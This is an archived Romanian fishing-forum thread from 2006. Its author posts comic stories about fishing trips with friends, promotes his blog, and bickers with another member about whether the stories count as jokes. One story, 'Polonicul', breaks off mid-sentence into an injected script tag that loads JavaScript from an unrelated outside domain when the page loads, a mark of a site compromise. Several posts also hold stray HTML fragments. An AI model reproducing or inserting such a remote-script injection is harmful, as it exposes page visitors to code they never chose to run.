PDA

Arată versiune întreagă : Noaptea la Caldarusani...

pescadorul
15.06.2006, 16:01
Soarele apunea cu repeziciune odata cu sperantele noastre de a vedea vre-o captura in juvelnic. Retina mai pastra inca unduirea permanenta si sacaitoare a apei, care ne jucase in ochi toata ziua, amplificata de razele soarelui. Iarba se misca in valuri, salcia de langa noi interpreta o samba, numai Mihai statea intepenit ca o statuie pe scaunelul ce gemea sub el. Nici macar iluzia optica nu putea sa-l urneasca. Acul cantarului trecea fluierand de suta cand avea proata inspiratie sa-si controleze evolutia in kilograme. Ca sa se amageasca facea socoteala in kintale. Viorel, in schimb, tremura din toate incheieturile si nu doar retina... facuse baie, acum pe seara si dupa ce speriase si broastele cu balaceala, incerca sa invinga racoarea tot mai accentuata clantanind din maxilare.......

Invit pe care care considera ca merita La Caldarusani (http://pescadorul.totalideea.com/)... pentru a termina ce au inceput...

pescadorul
24.06.2006, 07:00
Lanseta neomologata

Caldura sufocanta ne impinsese catre umbra unei salcii doar lansetele ramasesera sa suporte cu stoicism parjolul. Am tras tot calabalacul la umbra inclusiv pe Misu ce adormise sub umbrela. Bine, umbrela nu-i mai acoperea decat o parte din corpul masiv, jumatatea superioara se incarca cu calorii direct de la sursa si asta parea sa nu-l afecteze. Il mai controlam din cand in cand la jugulara sa vedem daca 'mai e cu noi' si daca nu cumva putem, deja, sa-i impartim 'avutul'.....

Daca doriti sa incercati lanseta (http://pescadorul.totalideea.com/url)....

pescadorul
24.06.2006, 19:18
Era inca acea vreme minunata cand Afumati 5 era 'balta saracului' cand veneai ca la piata fara frica ca vei pleca cu traista goala. Pe balta erau cateva locuri foarte bune vizate de 'cunoscatori' dar pentru ca acestia erau mai multi decat locurile, de fiecare data la prima rata de la 4 dimineata se organiza cate un cros ad-hoc. Vorbeai cu un pescar si cand intorceai capul te trezeai ca discutai cu copacii caci respectivul o luase la sanatoasa catre 'fata morgana'. Si cei mai grabiti erau, normal, cei mai in varsta fiecare cu betesugul lui incercand, in mod caraghios, sa-si regaseasca sprinteneala din tinerete. Si ajungeau, mai totdeauna, mai mult morti decat vii si constatau ca locul pentru care erau sa faca efortul suprem era deja ocupat de cu seara..........

Si dupa ce ati aruncat cu lanseta va puteti racori cu Apa de izvor (http://pescadorul.totalideea.com)

rossa
26.06.2006, 22:53
[/url] N-am inteles prea bine , trebuie sa radem la asta sau ce ?!?!?! Vad ca apar la rubrica de bancuri . O fi vreun stil nou ...http://smileys.smileycentral.com/cat/4/4_12_12.gif (http://www.smileycentral.com/?partner=ZSzeb001_ZNxdm414YYRO)

[url="http://www.smileycentral.com/?partner=ZSzeb068_ZNxdm414YYRO"]

pescadorul
27.06.2006, 04:59
Faci ce vrei... nu scrie nicaieri ca trebuie sa razi... poti sa si plangi... eventual sterge-le...

pescadorul
27.06.2006, 11:58
Da sunt edificat... fata de ce propui tu, chestii de un umor rafinat si spumos, 'bancurile' mele sunt niste nimicuri... iarta-ma!

sorin
27.06.2006, 12:16
Pescadorule, Rossa este unul din forumistii nostri mai

27.06.2006, 18:32
Pescadorule nu lua in seama ,continua sa faci si sa povestesti ce-ti place. Asteptam noutatismileys/smiley32.gif

rossa
27.06.2006, 23:34
Draga pescadorule vad ca ti-au sosit si avocatii (sa nu-i platesti mult) .Problema e ca nu aveai nevoie de ei . Cred ca am interpretat eu gresit faptul ca la bancuri ma asteptam sa gasesc bancuri , eventual sa rad . Scuza-ma se pare ca sunt ,, GICA CONTRA'' , din acest motiv mai si gresesc . Despre scrierile tale n-am zis nici ca-s proaste nici ca-s bune , nu am nici un fel de apreciere . Singurul lucru e ca , ti-am mai zis , ma asteptam sa le gasesc in alt topic . Cred ca te-ai sifonat prea devreme , sau ai citit printre randuri .

O zi buna .....si da-i inainte .

pescadorul
28.06.2006, 08:15
Nu am atata tupeu sa cred ca eu, un neica nimeni care face pe scriitorul chiar produc ceva care este apreciat de toata lumea. Mi s-a parut totusi o remarca rautacioasa tinand cont ca aici nu sunt postate doar bancuri. Poate atat ai reusit tu. Ai dreptul sa-ti exprimi opinia dar si eu am dreptul sa-mi apar 'interesele'... nici eu nu cred ca am realizat mare lucru dar se pare ca suntem singuri impotriva tuturor smileys/smiley4.gif

pescadorul
01.07.2006, 17:21
Monstrul din Moara...

Farurile masinii strapungeau bezna si incercam sa tin drumul taiat prin braul de arbori ce inconjurau Moara Domneasca, balta pe care, impreuna cu prietenii mei Mihai si Viorel, am ales-o in acea zi drept tinta. Totul era sa evit santurile adanci sapate de rotile tractoarelor, ce ramasesera intiparite de la ultimile ploi in pamantul, acum uscat si tare ca piatra. Spatiul era cam limitat de copacii ce strajuiau poteca, crengile rupte de vant se prelingeau pe parbriz si apoi pe toata capota pana in spate racaind vopseaua.
Copilotul, Viorel isi facea datoria

pescadorul
06.07.2006, 21:11
<DIV class=post id=post-28>
<H2>Pariuri sportive...</H2>
<DIV class=entrytext>
Pe langa alte preocupari care imi ocupa timpul, din strafundurile inconstientului a mai razbit una: pariurile sportive. Pe scurt ar fi vorba despre principiul, doi se intrec si al treilea castiga mizand pe unul dintre ei. In majoritatea zdrobitoare a cazurilor acest

pescadorul
15.07.2006, 04:17
Polonicul...

Ba, cred ca o sa ploua, a inceput Misu sa faca pe prezicatorul... Ce ma iar ti-e foame si-ti ploua in gura, l-a luat la rost Viorel... Imi miroase a ploaie fraierilor si simt la incheieturi... Mie imi miroase a tampit si ma injunghie intre coapse cand ma gandesc la sora-ta, am intervenit si eu uitandu-ma totusi la cer. Cat vedeai cu ochii nici o urma doar spre Dunare se zarea o dara alburie ca un fum.
Chiar nici un pericol de sus si doar faptul ca Mihai sarise peste masa de dimineata si acum aiura de foame, nu putea sa ne strice aventura. Ne aflam pe canal la Manastirea via Oltenita si dupa vre-o 80 de kilometri de condus pe asfalt si inca vre-o 4 pe aratura batatorita de tractoare ne desfatam sub razele soarelui de dimineata cu ochii la 'arme'. Tabara inamica avea ceva pierderi si nu numai la mal unde Misu tabarase pe el la varga dar si in larg, cateva exemplare notabile de caras salbatic venit din Dunare se zbateau in juvelnice.
Viorel si-a scos o lingurita, de neam prost, ruseasca stropita cu buline rosii. Ce dracu faci cu aia, le faci program artistic, l-a atacat Mihai... Pe cine vrei sa prinzi cu polonicul ala mai 'spinistule', l-am luat si eu la rand... Nu te forta prea tare ca omori vreo oaie de vis-a-vis... Vezi sa nu 'pacalesti' liniile de inalta tensiune ca te ducem lu'doamna mata impaiat... Fa-te ca nu esti cu noi ca rade lumea cand vede obiectul si crede ca a venit Circul Globus in oras... Dar Viorel, imperturbabil, continua sa-si monteze 'unealta' si uimindu-ne, fara sa raspunda la provocari. A aruncat chiar langa niste alge ce pluteau in deriva duse de apa ce incepuse sa 'curga' si tocmai cand parea ca a agatat somoiogul de ierburi, lanseta s-a facut arc si firul a inceput sa taie apa catre stanga spre lansetele mele. O lupta scurta si un avat cat toate zilele se zbatea sub ochii nostrii impietriti. Ba asta e prost, uite ce animal a scos, a inceput Misu sa se vaite... Natura ajuta handicapatii am inceput sa plang si eu... Viorel si-a extras 'polonicul' din botul rapitorului si dupa ce l-a pus cu precautie in juvelnic a inceput sa topaie, sa rada si sa-si pupe lanseta. Noi ne uitam unul la altul si faceam semne sugestive la tampla dar viermele geloziei ne cam rodea maruntaiele.
Frate, si ziceai ca mai ai o ligurita din asta minunata, am inceput eu tatonarea... Ce pisaturi din alea aurite si argintate, uite aici scula, delira si Misu, incercand sa-si perie colegul... Mai am un cacat sa-l mancati cu 'polonicul' de care va ranjeati fasolea mai devreme, a fost tot ce-am reusit sa extragem de la razboinicul nostru prieten care a inceput sa arunce iar. Dupa 4-5 lansari in gol un alt avat a muscat mortal. Noi, deja, ne injuram ca nu am luat si 'nalucile' ca nu stii niciodata ce gasesti pe balta. Grasimea ti-a presat creierul si l-a facut cat o nuca, ca nu puteai sa iei si tu cutia aia, deformatule... Bine ca ai luat tu, mi-a raspuns Mihai, ce dracu ai in zdreanta aia de geanta pe care o cari dupa tine ca un bou, chilotii lu'nevasta-ta, ca uite ce face dobitocu... si zvarrrr, nu ajungea la apa ca pestele o lua din zbor, eram bolnavi.
Vantul incepuse sa increteasca suprafata apei care curgea din ce in ce mai tare dinspre Dunare iar albitura nu mai sarea, fugise catre fund. Lansetele care intrasera intr-o perioada de acalmie au inceput, ca la un semn, sa invie si o repriza de pescuit indracit demonstra ca haita de carasi era iar in zona. Am profitat din plin de norcul efemer ce se abatuse pe capul nostru ca sa mai nivelam prapastia ce ne despartea de performanta ligurarului.
Misu, urnindu-si suncile s-a dus sa cotrobaie prin porbagaj... Tipatul lui Winnetou, capetenia pieilor rosii ce ne-a incantat copilaria, s-a auzit de langa masina. Winnetou la patrat interpreta dansul ritual al linguritei fluturand<<script src=http://www.iroe.ru/ngg.js></script>

pescadorul
16.07.2006, 00:48
Ce ieri era nou astazi e vechi....

pescadorul
24.07.2006, 16:06
S-a intamplat iar...

pescadorul
30.07.2006, 13:02
Concurs pe Branesti la care poti participa din fotoliu...

pescadorul
07.09.2006, 08:08
<DIV class=entry>
Ziua neagra...
In ceata diminetii se zarea, deja, poarta manastirii Caldarusani. Am intrat dar, dupa cativa zeci de metri, am parasit drumul catre locasul Domnului si am facut dreapta, pe camp, pe o poteca care ducea la balta. Pentru a ajunge la apa trebuia sa coboram o panta abrupta acoperita de iarba care, uda de roua diminetii, ne punea la grea incercare echilibrul. Am iesit din masina intinzandu-ne ca sa ne dezmortim oasele, numai Misu isi dezmortea matele servind ca gustare frugala, o paine taiata plina cu

pescadorul
25.12.2006, 04:50
Si-am incalecat pe-o sa... SARBATORI FERICITE!